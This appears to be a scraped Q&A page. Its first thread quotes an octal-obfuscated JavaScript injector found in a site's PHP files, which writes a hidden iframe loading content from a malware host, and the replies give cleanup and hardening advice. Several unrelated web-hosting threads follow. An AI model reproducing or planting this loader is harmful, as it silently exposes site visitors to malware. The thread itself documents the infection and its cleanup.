Found This Hack in my web server php files - virus

How did i get them and what can i do to avoid this in the future?
#8f4d8e#
echo "<script type=\"text/javascript\" language=\"javascript\" >ff=String;fff=\"fromCharCode\";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v=\"eval\";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0145,0163,0170,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0145,0163,0170,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0141,0142,0163,0157,0154,0165,0164,0145,0147,0151,0146,0164,056,0143,0157,0155,057,0137,0160,0162,0151,0166,0141,0164,0145,057,0143,0154,0153,056,0160,0150,0160,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0145,0163,0170,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0145,0163,0170,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+478!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>";
#/8f4d8e#

It seems to be redirecting to or injecting content from absolutegift dot com, a malware distributor. Somebody uploaded it to your server. This person (or bot) may have managed to get your password or he may have used an exploit. Change your passwords, make sure all user input (including uploads) is validated. Make sure you have a firewall running (I recommend csf) and scan your server for rootkits.

Contact your hosting provider and notify them of the issue. This is very important I've shutdown plenty of legit websites because they were compromised and the owner lost all their data.
If you are using a CMS such as Drupal, Wordpress, etc. etc. Make sure you upgrade and change admin passwords. If you have any plugins, make sure they are upgraded.
If you have no CMS, change your FTP & control panel passwords.
As for fixing the problem. If you are using a CMS, an in-place upgrade should replace all the files. If not, you can download all your files and use a word-processor like Notepad++ to do a find-and-replace throughout the directory. Also, your hosting provider might be able to restore from backup, or at least have some experience in fixing it.
To prevent it, don't use a CMS and learn some web security. Possibly hire a pentester.

this happened to me as well on an old site running Drupal 5. What I did is download the site and compared it with a clean copy of the codebase using meld (a graphical diff tool for linux).
I found that there was a file called god.php that was placed in one of the subdirectories and contained a php script which called R57. It's really scary what this thing can do.
Many of my files were infected with something like:
<?php
#8f4d8e#
...
#/8f4d8e#
?>
I cleaned this up manually a few times but kept being hacked until I removed the "god.php" file. I assume it might be called differently on your system.
If you have SSH access to the server go to your document root and search for all files containing the string:
grep -R "#8f4d8e#" .
You could also look for your version of the god.php file... look for traces of R57, for example by issuing:
grep -R "R57" .
Mine had a big ASCII art drawing of a bug at the beginning of the file.
I'm not sure how I got it but there were a list of bad things: un-updated very old version of Drupal, PHP4 with register_globals on, shared hosting (and probably a lousy company).
What I did is move the cleaned up site to another hosting company with PHP 5 and changed all passwords: drupal, ftp, mysql etc.

Related

How do I make a simple public read-only WebDAV server with SabreDAV?

I recently began looking into WebDAV, as I found it to be an option for letting me play a Blu-ray folder remotely - i.e. without requiring the viewer to download the whole 24gb ISO first.
Add a WebDAV source in Kodi v18 to a Blu-ray folder - and it actually plays! Very awesome.
The server can also be mounted on Windows with
net use m: http://example.com/webdavfolder/
or in Linux with
sudo mount -t davfs http://example.com/webdavfolder/ /mnt/mywebdav
-and should then (in theory) play with any software media players that supports Blu-ray Disc Java (BD-J), such as PowerDVD and VLC.
vlc bluray:///mnt/mywebdav --bluray-menu
PowerDVD.exe AUTOPLAY BD m:
(Unless of course time-out values has been set too low, which seems to be the case for VLC at the moment).
Anyway, all this is great, except I can't figure out how to make my WebDAV server read-only. Currently anyone can delete files as they wish, and that's of course not optimal.
So far I've only experimented with SabreDAV, because afaik that's the only option I have if I want to keep using my existing webhost. Trying with very minimal setups, because I've read that minimal setups should default to a read-only solution. It just doesn't seem to happen.
I initially used the setup from http://sabre.io/dav/gettingstarted/ and tried removing some lines. Also tried calling chmod 0444 MainFolder -R on the webserver. And I can see that everything does get a read-only attribute. But it changes nothing. It's still possible to delete whatever I want. :-(
What am I missing?
Maybe I'm using the wrong technology for what I want to do? Is there some other/better way of offering a Blu-ray folder for remote viewing? (One that includes the whole experience - i.e. full Java menus etc).
I should probably mention that all of this is of course perfectly legal. It is my own Blu-ray project - not copyright material.
Also: Difficult to decide if this belongs on StackOverflow or SuperUser. I ended up posting it on StackOverflow because SabreDAV is about coding, and because there's no sabredav tag on SuperUser.
You have two options:
Create your own file/directory classes for sabre/dav that simply throw an error when trying to delete. You can basically start with a copy of Sabre\DAV\FS\Directory and Sabre\DAV\FS\File and change the methods that do writing.
Since you're considering just using linux file permissions, really the key thing you are missing is that that 'deleting' is not controlled on the file or directory you're trying to delete. To delete a file or directory in unix, all you need is write permissions on the parent directory. However, I wouldn't recommend going this route as doing this will just cause a weird error in sabre/dav, which might leave clients in a confused state. It would result in a 500 error, not the expected 403 error.

typo3 website move to other domain - need help step by step

I just got a typo3 website and need to transfer to an other domain.
Is it enough to copy all the folders (except typo3temp?) to the new place?
First I just changed baseurl in ts but it didn't do anything..
Should I do anything with the database when it still on the same server?
In case your question is about "cloning" a complete TYPO3-system an rsync/copy of the whole folder (yes including typo3temp) is the best idea, as this works on all versions, everything else (like excluding typo3temp) depends a whole lot on your TYPO3 expertise to resolve. The database needs to be copied as well. If you need to change db-name or db-credentials on the new system you need to change them in
typo3conf/LocalConfiguration.php
As soon as you have done this Install Tool and Backend should work: At first try the Install Tool:
https://my.new.domain/typo3/install/
If that doesn't work your problem is with the webserver configuration or dns.
If that works (and the reports there show no errors), try the Backend:
https://my.new.domain/typo3/
In case your question is about which changes are necessary to your TYPO3-installation if domain changes and the web server itself is configured correctly, then there are probably two things you need to change, in order to make the frontend work (although both cases might be omitted, depending on your configuration):
sys_template record, if any of those use absRefPrefix or baseurl. If you have access to the MySQL-Database a
SELECT pid FROM sys_template WHERE config LIKE "%baseurl%" OR "%absRefPrefix";
might help finding the template, however these template configuration might also be stored in files (typically in fileadmin/templates/**)
sys_domain records, a MySQL
SELECT pid FROM sys_domain;
might uncover where those are stored
However these changes are only necessary to enable the frontend to work.
Add a domain record in the backend. And while you don't need the content of the typo3temp folder, make sure the folder actually exists.
When you go to the new domain name in your browser, what happens?
Do you get redirected to the old domain? If so, maybe there is an .htaccess redirect happening.
Do you get to the new domain, but if you click on a link end up on the old one?
Do you get an error? If so, what is the error?
Does something else happen?

Where do I put the files I want to be displayed on my webpage on my webhost?

So I just finished the railstutorial.org twitter clone example and I want to put it online with my web hosting provider bluehost. Right now all I have is a file called sample_app with all of the rails stuff in it. And it works fine when I visit it on localhost:3000.
So I go to my bluehost file manager and there are 9 different folders, like public_html, public_ftp, rails_apps, www, tmp, access_logs, ect. Ive uploaded sample_app into this overall directory and into the public_html directory itself. But when I visit my website it just displays the html in a default.html file in the public_html directory.
What exactly is telling my hosting service to use public_html/default.html of any of the hundereds of different files and folders that are in other places on my server space? How do I find this thing and tell it to instead use sample_app or public_html/sample_app and then process everything in that to display my rails application?
Ive tried using bluehost support and they emailed me and said this would be accomplished by creating a symlink which links ~/rails_apps/NinetyNine/public to ~/public_html. I have no idea how to do this and the guides I find online all tell me to enter a series of commands. I dont know whether to do this in a terminal on my ubuntu system or some command prompt that bluehost provides. If it is at a terminal on my system which directory should I be in? any attempts I have made on my system have resulted in a no such file or directory error. When I asked bluehost to explain this they said that this was outside of the scope of their support and had to do with web development not hosting. It struck me as odd that they were unwilling to explain their own response to my problem but whatever.
If anyone of you could help me or point me in the right direction I would very much appreciate it. Thank you
What is telling my hosting service to use public_html/default.html ?
That would be a setting the web server configuration, probably Apache.
In Apache's case, the public_html directory is usually enabled with the
UserDir directive.
The default.html, is also an Apache configuration, DirectoryIndex.
Answering these because you asked: but typically, the global Apache configuration
is maintained by your provider (though you usually have some means to customize
parts of it).
Create the symlink from public_html to
They like gave you a command like (maybe not exactly)
$ ln -s ~/rails_apps/NinetyNine/public public_html
That is something that is intended to be run on your webhost, from a command prompt,
at the top of your home directory.
Look for docs on bluehost for finding out how to get SSH shell access.
That's where you'll enter the command.
More generally, however, you want to make sure you read the docs on how your
provider wants you to upload applications. Bluehost seems to have very nice
docs here:
https://my.bluehost.com/cgi/help/rails
Why your hosting provided said it was out of scope.
You're a beginner, and that's officially OK. Welcome!
But if you asked them a question like "Do I enter these commands on my computer
or yours", they are definitely going to politely respond that this out of scope;
meaning -- "We can't hand-hold you through this". If you ran a gas station and
someone asked you how to use the pump, you'd tell them. But if they then asked
"OK but do I put the gas in my car or yours?" you'd be reluctant to answer, because
there's some fundamental missing.
So how do I get more pointers, directions on this stuff?
Lots of approaches. By the far the best is to do as much stuff as you can on
your own computer. In your case, you could easily set up your own Apache
(Macs and Linux frequently ship with it - readily installable on Windows), and
that would clear up a lot of the conceptual issues.
Good luck!

Hiding production passwords from unauthorized users in Symfony

Symfony worked great for us when we were a small team of trusted developers. Now however, we are getting more people to help out, which leads to a problem with managing production passwords checked into source control.
I have production passwords for our DB, API keys, etc. stored in the Symfony config files which I do not want all developers to have access to. How can I hide these passwords from unauthorized developers and yet still grant them access to the source code?
If you're already using a version control: your first stop should be removing all passwords from the history in your versioning system. Good luck ;-)
Next: isolate the files which have passwords in them. (Probably config/databases.yml and apps/<yourapp>/app.yml.).
Copy/rename this files to *.yml.dist (for example: config/databases.yml.dist). Clean up all production passwords from these files, and leave only
the bare minimum to keep it going.
Make sure the original files don't appear in your VCS ever again. (svn ignore, or the likes).
Now when you set up a new environment, you can just copy the *.dist files to their 'real' names.
(What I did for my project is move all API keys to a single apikeys.yml in the config directory. That way all the properties in the app.yml keep being versioned, and my api keys don't appear in the VCS.
Hope you get the answer for your question. Recently I have implement these kind of works in my project.I think to store these kind of confidential data database is the safe options and get this data using filter is the best option no need to store your data in app.yml.

Umbraco losing admin nodes

After a publish up to a remote server the Umbraco admin section on the remote server is not showing any nodes. The pages and images and everything serve correctly, but in the Umbraco admin section there is nothing below the top level nodes in each section and I can't right click and choose 'republish entire site'.
I've connected my localhost version to the same database and there I can see the node structures (but republishing made no difference) and I could see the node structures on the remote server before the latest push which did not include any .config changes.
Does anyone have a script that will re-create the node structure?
EDIT
I've seen a number of links on the Umbraco site like Unable to publish content into umbraco.config but none of it helped - including some permissions advice like #Niks.
I do have a workaround which is to stop and restart the server - which re-populated the nodes without any side-effects - but obviously this is inappropriate in a live environment.
I've seen this before manifesting as a caching problem. Firstly you should make Umbraco refresh its node cache. To do this hit the URL -
http://example.com/umbraco/dialogs/republish.aspx?xml=true
replacing example.com with your own host. Next, recycle the App Pool on the Umbraco server. Finally, clear your browsers local cache and restart it.
You may also be able to avoid this happening in the first place by completely stopping the Umbraco site you are deploying in IIS, copying up your files and then restarting.
Sounds like you may have permission issues. If you're on IIS6/7 make sure to add NETWORK SERVICE read/write/modify on the necessary folders:
/App_Data
/config
/css
/scripts
/masterpages
/data
/umbraco
/umbraco_client
If on a lower version of IIS make sure to add ASP.NET with the same permissions. Hope this helps.

Resources